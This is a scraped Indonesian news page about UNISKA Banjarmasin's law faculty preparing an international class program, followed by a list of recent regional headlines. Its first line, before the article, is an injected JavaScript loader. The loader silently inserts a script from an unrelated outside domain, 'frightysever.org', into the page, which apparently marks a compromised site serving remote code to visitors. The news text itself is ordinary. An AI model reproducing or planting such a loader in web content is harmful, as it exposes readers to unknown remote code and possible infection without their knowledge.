(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Banyak Diminati, Fakultas Hukum UNISKA Siap Buka Program Kelas Internasional


KANALKALIMANTAN.COM, BANJARMASIN – Fakultas Hukum Universitas Muhammad Arsyad Al-Banjari (UNISKA) Banjarmasin menjadi jurusan paling favorit saat penerimaan mahasiswa baru.

Dekan Fakultas Hukum Uniska Dr Afif Khalid, SHI, SH, MH mengatakan, dari 1.250 calon mahasiswa, setelah dilakukan seleksi terjaring 850 orang. Jumlah ini merupakan terbanyak se Kalimantan.

Uniska yang masuk dalam Liga Satu karena memiliki Mahasiswa lebih dari 15 ribu orang, dengan ketentuan Dirjen Dikti harus berfokus pada kegiatan Internasional, menetapkan Fakultas Ekonomi dan Fakultas Hukum untuk melaksanakan Kelas Internasional.

Menurut Afif, hal tersebut sangat beralasan dikarenakan dua Fakultas ini dinilai memiliki Sumber Daya Manusia yang dapat melaksanakan program tersebut.

 

 

Baca juga: Penerima PKH di Kelurahan Panamas Didata Terima Modal Usaha Potensial

Untuk hal ini, Afif menyebutkan, Kelas Internasional adalah Kelas Unggulan yang harus memiliki pembeda, sehingga tidak hanya menonjolkan kuantitas, tapi juga dalam hal kualitasnya.

“Saya kemarin dengan Rektor berkomitmen, bahwa kami tidak hanya menunjukkan dari segi kuantitas. Tapi juga dari segi kualitas. Kami sudah menjalin kerjasama dengan Malaysia, mudah-mudahan Semester Genap ini sudah bisa melaksanakan,” katanya Senin, (6/2/2022).

Adapun tantangan dalam membuat Kelas Internasional dikatakannya adalah kemampuan merekrut Mahasiswa dengan potensi tingkat Bahasa Asing seperti Bahasa Inggris.

“Bagaimana kita menjaring Mahasiswa dengan potensi tingkat Bahasa Asing, yang kita utamakan dulu Bahasa Inggris, karena itu Bahasa Internasional yang dipergunakan di seluruh dunia,” tegas Afif.

Disebutkannya, di seluruh Indonesia hanya ada beberapa PTN dan PTS yang melaksanakan Kelas Internasional. Jika ini bisa terlaksana, maka FH Uniska satu-satunya di Kalimantan yang bisa melaksanakan ini.

Baca juga: BPBD Kalsel Pasang Early Warning System di Kabupaten Rawan Banjir

Lebih lanjut Dekan Fakultas Hukum ini Mengatakan jika bagi pihaknya tidak ada yang berat, hanya saja harus dilakukan dengan seleksi yang betul-betul.

“Kita bertekad menempatkan kuantitas seimbang dengan kualitas,” pungkasnya. (kanalkalimantan.com/rizki)

Reporter: rizki
Editor: cell


Al Ghifari

Recent Posts

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

13 menit ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

24 menit ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

4 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

15 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

17 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

17 jam ago

This website uses cookies.